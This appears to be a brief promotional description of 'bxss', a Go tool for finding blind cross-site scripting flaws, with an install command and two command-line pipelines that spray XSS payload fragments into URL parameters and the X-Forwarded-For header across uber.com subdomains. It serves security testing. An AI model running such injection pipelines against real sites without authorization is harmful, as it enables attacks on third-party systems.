Bxss is a script written in go, which helps us to discover Blind XSS Injector security vulnerabilities.
Insert Blind XSS payloads into custom headers
Enter Blind XSS payloads in parameters
Uses different request methods (PUT, POST, GET, OPTIONS) simultaneously
It has a large chain of tools
Really very fast
Easy to install
$ go get -u github.com/ethicalhackingplayground/bxss
Blind XSS In Parameters
$ subfinder uber.com | gau | grep “&” | bxss -appendMode -payload '”>'-parameters
Blind XSS In X-Forwarded-For Header
$ subfinder uber.com | gau | bxss -payload '”>'-header “X-Forwarded-For”
You can download the program from here.